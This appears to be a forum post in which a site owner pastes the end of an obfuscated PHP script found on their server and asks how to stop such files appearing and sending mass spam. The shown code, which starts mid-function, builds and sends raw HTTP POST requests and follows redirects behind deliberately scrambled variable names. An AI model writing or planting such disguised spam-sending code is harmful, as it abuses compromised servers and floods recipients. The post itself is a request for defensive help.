$qttdtutjpo = "data";
${"GLOBALS"}["qzkbuomkiwt"] = "k";
$xturoya = "data";
foreach (${${"GLOBALS"}["icgdbvfx"]}["data"] AS ${${"GLOBALS"}["qzkbuomkiwt"]} => ${${"GLOBALS"}["beratloij"]})
${${"GLOBALS"}["theexecgcpc"]} .= urlencode(${$egwwjfvmn}) . "=" . urlencode(${${"GLOBALS"}["qsvwagufkq"]}) . "&";
if (substr(${$fkqgohlfyhme}, -1) == "&")
${$qttdtutjpo} = substr(${$xturoya}, 0, -1);
}
${"GLOBALS"}["qdybannd"] = "data";
$vpqzmjw = "request";
${${"GLOBALS"}["qdybannd"]} .= "\r\n\r\n";
${${"GLOBALS"}["mxbdjl"]} .= "Content-type: application/x-www-form-urlencoded\r\n";
${$vpqzmjw} .= "Content-length: " . strlen(${$bdrehri}) . "\r\n";
}
${${"GLOBALS"}["mxbdjl"]} .= "\r\n";
if (${$rrgdjfvkdzd}["method"] == "POST")
${${"GLOBALS"}["mxbdjl"]} .= ${${"GLOBALS"}["yhdqjv"]};
$sttbiso = "h_detected";
@fwrite(${${"GLOBALS"}["szyxqtzcz"]}, ${${"GLOBALS"}["wfcqsum"]});
${${"GLOBALS"}["voftntvv"]} = "";
${${"GLOBALS"}["gcjhotz"]} = "";
${$sttbiso} = false;
while (!@feof(${${"GLOBALS"}["wsxrgoan"]})) {
${"GLOBALS"}["ggtgxfqmhr"] = "fp";
$mqieenew = "res";
$wetpmnqilx = "h_detected";
${$mqieenew} .= @fread(${${"GLOBALS"}["ggtgxfqmhr"]}, 1024);
if (!${$wetpmnqilx} && strpos(${${"GLOBALS"}["voftntvv"]}, "\r\n\r\n") !== FALSE) {
$ymmwrvoxk = "params";
${"GLOBALS"}["mtvkkvxdxoa"] = "params";
${${"GLOBALS"}["plfpgtb"]} = true;
$lqolddccno = "res";
${${"GLOBALS"}["gcjhotz"]} = substr(${${"GLOBALS"}["voftntvv"]}, 0, strpos(${${"GLOBALS"}["voftntvv"]}, "\r\n\r\n"));
${"GLOBALS"}["inyzbimrc"] = "params";
${$lqolddccno} = substr(${${"GLOBALS"}["voftntvv"]}, strpos(${${"GLOBALS"}["voftntvv"]}, "\r\n\r\n") + 4);
${"GLOBALS"}["viuxkiqghe"] = "params";
$ynocuad = "params";
if (${${"GLOBALS"}["inyzbimrc"]}["return"] == "headers" || ${$ynocuad}["return"] == "array" || (isset(${$ymmwrvoxk}["redirect"]) && ${${"GLOBALS"}["icgdbvfx"]}["redirect"] == true)) {
${"GLOBALS"}["tihbfknd"] = "headers";
$cxurfemi = "v";
$nswjgtyivh = "h";
${"GLOBALS"}["zvszpu"] = "h";
${${"GLOBALS"}["zvszpu"]} = explode("\r\n", ${${"GLOBALS"}["tihbfknd"]});
${${"GLOBALS"}["gcjhotz"]} = array( );
$vberfrg = "k";
foreach (${$nswjgtyivh} as ${$vberfrg} => ${$cxurfemi}) {
$goonxstjkr = "v";
if (strpos(${$goonxstjkr}, ":")) {
${"GLOBALS"}["kkjigtjk"] = "v";
$pdtxksekkf = "v";
${"GLOBALS"}["nxnazsix"] = "v";
${${"GLOBALS"}["mqlebyzvmj"]} = substr(${${"GLOBALS"}["nxnazsix"]}, 0, strpos(${${"GLOBALS"}["kkjigtjk"]}, ":"));
${${"GLOBALS"}["beratloij"]} = trim(substr(${$pdtxksekkf}, strpos(${${"GLOBALS"}["beratloij"]}, ":") + 1));
}
${${"GLOBALS"}["gcjhotz"]}[strtoupper(${${"GLOBALS"}["mqlebyzvmj"]})] = ${${"GLOBALS"}["beratloij"]};
}
}
if (isset(${${"GLOBALS"}["icgdbvfx"]}["redirect"]) && ${${"GLOBALS"}["viuxkiqghe"]}["redirect"] == true && isset(${${"GLOBALS"}["gcjhotz"]}["LOCATION"])) {
${"GLOBALS"}["vxgtkfmq"] = "params";
$mevkiblihp = "headers";
${${"GLOBALS"}["icgdbvfx"]}["url"] = ${$mevkiblihp}["LOCATION"];
if (!isset(${${"GLOBALS"}["icgdbvfx"]}["redirect-count"]))
${${"GLOBALS"}["icgdbvfx"]}["redirect-count"] = 0;
if (${${"GLOBALS"}["vxgtkfmq"]}["redirect-count"] < 10) {
$fkqxmrulf = "func";
$ftjyenwi = "params";
${${"GLOBALS"}["icgdbvfx"]}["redirect-count"]++;
${"GLOBALS"}["lbyothw"] = "func";
${"GLOBALS"}["ntendwsbp"] = "func";
${$fkqxmrulf} = __FUNCTION__;
return @is_object($this) ? $this->${${"GLOBALS"}["ntendwsbp"]}(${$ftjyenwi}) : ${${"GLOBALS"}["lbyothw"]}(${${"GLOBALS"}["icgdbvfx"]});
}
}
if (${${"GLOBALS"}["mtvkkvxdxoa"]}["return"] == "headers")
return ${${"GLOBALS"}["gcjhotz"]};
}
}
@fclose(${${"GLOBALS"}["ihvknvh"]});
} else
return FALSE;
if (${${"GLOBALS"}["icgdbvfx"]}["return"] == "array")
${${"GLOBALS"}["voftntvv"]} = array(
"headers" => ${$pmcvjns},
"content" => ${${"GLOBALS"}["krcdefut"]}
);
return ${${"GLOBALS"}["hrixbsdqcqma"]};
}
?>Any thoughts how I can prevent these files from appearing and sending mass spam???
